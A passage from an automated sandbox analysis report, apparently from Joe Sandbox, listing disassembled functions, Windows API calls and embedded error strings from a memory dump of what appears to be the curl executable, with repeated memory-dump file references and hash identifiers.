                                                                                                                                                                    • Associated: 00000022.00000002.20309581446.000000000031F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309612880.0000000000321000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309645029.0000000000322000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309679043.0000000000323000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309716539.0000000000324000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309793088.0000000000367000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309827793.000000000036C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_34_2_1c0000_curl.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: EnvironmentStrings$ByteCharFreeMultiWide
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1823725401-0
                                                                                                                                                                    • Opcode ID: 7606fa2b98a1311d7608caf037c9dbd81c1ccf8b9f516fd35831d5772176142c
                                                                                                                                                                    • Instruction ID: 4288b555d82f26c6686cb09b70b8ceefb30a00ffdb426a18a5ee2f85c26dd859
                                                                                                                                                                    • Opcode Fuzzy Hash: 7606fa2b98a1311d7608caf037c9dbd81c1ccf8b9f516fd35831d5772176142c
                                                                                                                                                                    • Instruction Fuzzy Hash: 6A0184A2925657BBAF305FB56C4CD3B6BBCDA913A5316462EFC08D3140EA64CC5086B0
                                                                                                                                                                    Function 001DF0B0 Relevance: 7.5, APIs: 5, Instructions: 47COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?,00000000,?,?,00000000,001D9016,00000000,001D93E0), ref: 001DF0C0
                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,00000000,001D9016,00000000), ref: 001DF0D3
                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,00000000,001D9016,00000000), ref: 001DF0DF
                                                                                                                                                                    • WaitForSingleObjectEx.KERNEL32(00000000,000000FF,00000000,?,?,00000000,001D9016,00000000), ref: 001DF0F2
                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,00000000,001D9016,00000000), ref: 001DF0FA
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000022.00000002.20309070776.00000000001C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000022.00000002.20309033901.00000000001C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309297034.00000000002DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309353805.0000000000309000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309384926.000000000030B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309419651.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309448745.0000000000311000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309483305.000000000031B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309519624.000000000031C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309551058.000000000031D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309581446.000000000031F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309612880.0000000000321000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309645029.0000000000322000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309679043.0000000000323000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309716539.0000000000324000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309793088.0000000000367000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309827793.000000000036C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_34_2_1c0000_curl.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CloseCriticalHandleSection$EnterLeaveObjectSingleWait
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 607221738-0
                                                                                                                                                                    • Opcode ID: 74b6dfc00e7560501dfd518d76639674a876eb10487bbd496ec4b7f37d07ae20
                                                                                                                                                                    • Instruction ID: 6b610a6b6cb7e01fcb0d339911acb2fc82df722b82ed2219c629594c5e1bd0ea
                                                                                                                                                                    • Opcode Fuzzy Hash: 74b6dfc00e7560501dfd518d76639674a876eb10487bbd496ec4b7f37d07ae20
                                                                                                                                                                    • Instruction Fuzzy Hash: 89019E70501211EBDB209F54FC89B42BBB8FF00362F14816AF806CA265CB71E925CBA1
                                                                                                                                                                    Function 001DF4C0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 154COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Strings
                                                                                                                                                                    • getaddrinfo() failed for %s:%d; %s, xrefs: 001DF652
                                                                                                                                                                    • init_resolve_thread() failed for %s; %s, xrefs: 001DF615
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000022.00000002.20309070776.00000000001C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000022.00000002.20309033901.00000000001C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309297034.00000000002DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309353805.0000000000309000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309384926.000000000030B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309419651.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309448745.0000000000311000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309483305.000000000031B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309519624.000000000031C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309551058.000000000031D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309581446.000000000031F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309612880.0000000000321000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309645029.0000000000322000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309679043.0000000000323000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309716539.0000000000324000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309793088.0000000000367000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309827793.000000000036C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_34_2_1c0000_curl.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: getaddrinfo() failed for %s:%d; %s$init_resolve_thread() failed for %s; %s
                                                                                                                                                                    • API String ID: 0-1389973398
                                                                                                                                                                    • Opcode ID: c14b2a4309168a3b30edf15dd00f01903b076f9cf31cfa9fde35c66cb3349e8f
                                                                                                                                                                    • Instruction ID: 6fed6da9dc312176728c3342a86cac9d335161b5477f002050f2935e8af92f98
                                                                                                                                                                    • Opcode Fuzzy Hash: c14b2a4309168a3b30edf15dd00f01903b076f9cf31cfa9fde35c66cb3349e8f
                                                                                                                                                                    • Instruction Fuzzy Hash: 834181716143059BCB04EF24D842AAFB7D9EFD8314F40462EF88997392EF74DA158B92
                                                                                                                                                                    Function 001FC460 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 146COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Strings
                                                                                                                                                                    • FTP response aborted due to select/poll error: %d, xrefs: 001FC5CB
                                                                                                                                                                    • FTP response timeout, xrefs: 001FC5E9
                                                                                                                                                                    • We got a 421 - timeout!, xrefs: 001FC58C
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000022.00000002.20309070776.00000000001C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000022.00000002.20309033901.00000000001C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309297034.00000000002DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309353805.0000000000309000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309384926.000000000030B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309419651.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309448745.0000000000311000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309483305.000000000031B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309519624.000000000031C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309551058.000000000031D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309581446.000000000031F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309612880.0000000000321000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309645029.0000000000322000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309679043.0000000000323000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309716539.0000000000324000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309793088.0000000000367000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309827793.000000000036C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_34_2_1c0000_curl.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: FTP response aborted due to select/poll error: %d$FTP response timeout$We got a 421 - timeout!
                                                                                                                                                                    • API String ID: 0-2064316097
                                                                                                                                                                    • Opcode ID: a5447c63151ba3a1c7036ac34fd8cda009a8874f3a3995e797557501f2ec401c
                                                                                                                                                                    • Instruction ID: 82d9323fd2f50c850a5537993c81ef2e2852ea39d7a101c0247c6d36015fcb9b
                                                                                                                                                                    • Opcode Fuzzy Hash: a5447c63151ba3a1c7036ac34fd8cda009a8874f3a3995e797557501f2ec401c
                                                                                                                                                                    • Instruction Fuzzy Hash: 9441D271B043099FD718DF19D8406BAB3E1FBC8324F04463AFA5887391E734DA489B92
                                                                                                                                                                    Function 001F8280 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 138COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • recvfrom.WS2_32(?,?,?,00000000,?,00000080), ref: 001F82CA
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000022.00000002.20309070776.00000000001C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000022.00000002.20309033901.00000000001C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309297034.00000000002DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309353805.0000000000309000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309384926.000000000030B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309419651.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309448745.0000000000311000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309483305.000000000031B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309519624.000000000031C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309551058.000000000031D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309581446.000000000031F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309612880.0000000000321000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309645029.0000000000322000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309679043.0000000000323000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309716539.0000000000324000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309793088.0000000000367000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309827793.000000000036C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_34_2_1c0000_curl.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: recvfrom
                                                                                                                                                                    • String ID: %s$Internal error: Unexpected packet$Received too short packet
                                                                                                                                                                    • API String ID: 846543921-1418437813
                                                                                                                                                                    • Opcode ID: 0e919c5c6601fbb6e992e0140ad55034a7e13b0494c9e3aada830cd771710723
                                                                                                                                                                    • Instruction ID: c50733278f0c4f7c45e4cd8215e4384fbec492e59bb72833cbcee8352907258c
                                                                                                                                                                    • Opcode Fuzzy Hash: 0e919c5c6601fbb6e992e0140ad55034a7e13b0494c9e3aada830cd771710723
                                                                                                                                                                    • Instruction Fuzzy Hash: 6441F3706046058FD724DF25C841BBBB7E4FB85308F44852EF59AC7292DB39E809DB91
                                                                                                                                                                    Function 001E5510 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 78networkCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    Strings
                                                                                                                                                                    • SSL_write() return error %d, xrefs: 001E55FA
                                                                                                                                                                    • SSL_write() error: %s, xrefs: 001E55DE
                                                                                                                                                                    • SSL_write() returned SYSCALL, errno = %d, xrefs: 001E55AA
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000022.00000002.20309070776.00000000001C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000022.00000002.20309033901.00000000001C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309297034.00000000002DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309353805.0000000000309000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309384926.000000000030B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309419651.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309448745.0000000000311000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309483305.000000000031B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309519624.000000000031C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309551058.000000000031D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309581446.000000000031F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309612880.0000000000321000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309645029.0000000000322000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309679043.0000000000323000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309716539.0000000000324000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309793088.0000000000367000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309827793.000000000036C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_34_2_1c0000_curl.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLast
                                                                                                                                                                    • String ID: SSL_write() error: %s$SSL_write() return error %d$SSL_write() returned SYSCALL, errno = %d
                                                                                                                                                                    • API String ID: 1452528299-1841518057
                                                                                                                                                                    • Opcode ID: cc8ac22ba481445adc6c4cbd5ff12dc5d5883c280885dafa3802ab14717d7f61
                                                                                                                                                                    • Instruction ID: 88d0702e28a60389c257eb2dc9d93ae3d252e70983b36e260dec1c3e85d8cd86
                                                                                                                                                                    • Opcode Fuzzy Hash: cc8ac22ba481445adc6c4cbd5ff12dc5d5883c280885dafa3802ab14717d7f61
                                                                                                                                                                    • Instruction Fuzzy Hash: DD210671A24640DBD724AB24DD417AEB3E9BF58314F400625F469872D2DB70A514CB52
                                                                                                                                                                    Function 001CB930 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 69COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetEnvironmentVariableA.KERNEL32(APPDATA,00000400,00000400,?,?,_curlrc), ref: 001CB958
                                                                                                                                                                    • ExpandEnvironmentStringsA.KERNEL32(APPDATA,?,00000400,?,_curlrc), ref: 001CB98D
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000022.00000002.20309070776.00000000001C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000022.00000002.20309033901.00000000001C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309297034.00000000002DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309353805.0000000000309000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309384926.000000000030B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309419651.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309448745.0000000000311000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309483305.000000000031B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309519624.000000000031C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309551058.000000000031D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309581446.000000000031F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309612880.0000000000321000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309645029.0000000000322000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309679043.0000000000323000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309716539.0000000000324000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309793088.0000000000367000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309827793.000000000036C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_34_2_1c0000_curl.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Environment$ExpandStringsVariable
                                                                                                                                                                    • String ID: APPDATA$_curlrc
                                                                                                                                                                    • API String ID: 2376774201-2304619060
                                                                                                                                                                    • Opcode ID: 882e8bb747715347cdd4ff4cfb8b8ff41e7e8786a6b4551cf7a3afc7ebb81bb7
                                                                                                                                                                    • Instruction ID: 4d630428f080e32ae1bc0921505dae2ec875602ab9d5405264fb258ce29c457b
                                                                                                                                                                    • Opcode Fuzzy Hash: 882e8bb747715347cdd4ff4cfb8b8ff41e7e8786a6b4551cf7a3afc7ebb81bb7
                                                                                                                                                                    • Instruction Fuzzy Hash: A611BCB29041505BD730A7109C87FFFB3D8EB54759F85442EEB49D3140EB34D9098792
                                                                                                                                                                    Function 00205050 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43networkCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    Strings
                                                                                                                                                                    • WSAStartup failed (%d), xrefs: 00205079
                                                                                                                                                                    • insufficient winsock version to support telnet, xrefs: 002050B6
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000022.00000002.20309070776.00000000001C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000022.00000002.20309033901.00000000001C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309297034.00000000002DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309353805.0000000000309000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309384926.000000000030B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309419651.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309448745.0000000000311000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309483305.000000000031B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309519624.000000000031C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309551058.000000000031D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309581446.000000000031F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309612880.0000000000321000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309645029.0000000000322000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309679043.0000000000323000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309716539.0000000000324000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309793088.0000000000367000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309827793.000000000036C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_34_2_1c0000_curl.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CleanupStartup
                                                                                                                                                                    • String ID: WSAStartup failed (%d)$insufficient winsock version to support telnet
                                                                                                                                                                    • API String ID: 915672949-1763879679
                                                                                                                                                                    • Opcode ID: 0caae65b670913753d476f3cddaee3156520aab1ffe77c7034eb4cbd1805005b
                                                                                                                                                                    • Instruction ID: 8c99b2c4beb7c356d060cb4ed2ee724f5b1d9c63081a0cce516ac3ded95d6846
                                                                                                                                                                    • Opcode Fuzzy Hash: 0caae65b670913753d476f3cddaee3156520aab1ffe77c7034eb4cbd1805005b
                                                                                                                                                                    • Instruction Fuzzy Hash: 58F0D674A26A105BE720AB24AC57BFF33999F4A305F80401AFC8982383EA6549108AD3
                                                                                                                                                                    Function 001DDE40 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37networkCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • setsockopt.WS2_32(?,00000006,00000001,?,00000004), ref: 001DDE5E
                                                                                                                                                                    • WSAGetLastError.WS2_32(?,?,?,001DE0AE), ref: 001DDE68
                                                                                                                                                                      • Part of subcall function 001D23B0: GetLastError.KERNEL32(?,00000000,?,001DD974), ref: 001D23B7
                                                                                                                                                                      • Part of subcall function 001D23B0: GetLastError.KERNEL32(?,?,?,?,001DD974), ref: 001D246B
                                                                                                                                                                      • Part of subcall function 001D23B0: SetLastError.KERNEL32(00000000,?,?,?,?,001DD974), ref: 001D2476
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000022.00000002.20309070776.00000000001C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000022.00000002.20309033901.00000000001C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309297034.00000000002DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309353805.0000000000309000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309384926.000000000030B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309419651.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309448745.0000000000311000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309483305.000000000031B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309519624.000000000031C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309551058.000000000031D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309581446.000000000031F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309612880.0000000000321000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309645029.0000000000322000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309679043.0000000000323000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309716539.0000000000324000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309793088.0000000000367000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309827793.000000000036C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_34_2_1c0000_curl.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLast$setsockopt
                                                                                                                                                                    • String ID: Could not set TCP_NODELAY: %s$TCP_NODELAY set
                                                                                                                                                                    • API String ID: 3136324617-1562148346
                                                                                                                                                                    • Opcode ID: 4e0c96c6f519e13e664bd65abd7934ff06d639df8c52958e0cadf4ab925f4b9a
                                                                                                                                                                    • Instruction ID: 08d7713076244acbcef4fd4025bc7fd1aa55ea6d134a99e5375ebf700db5aa32
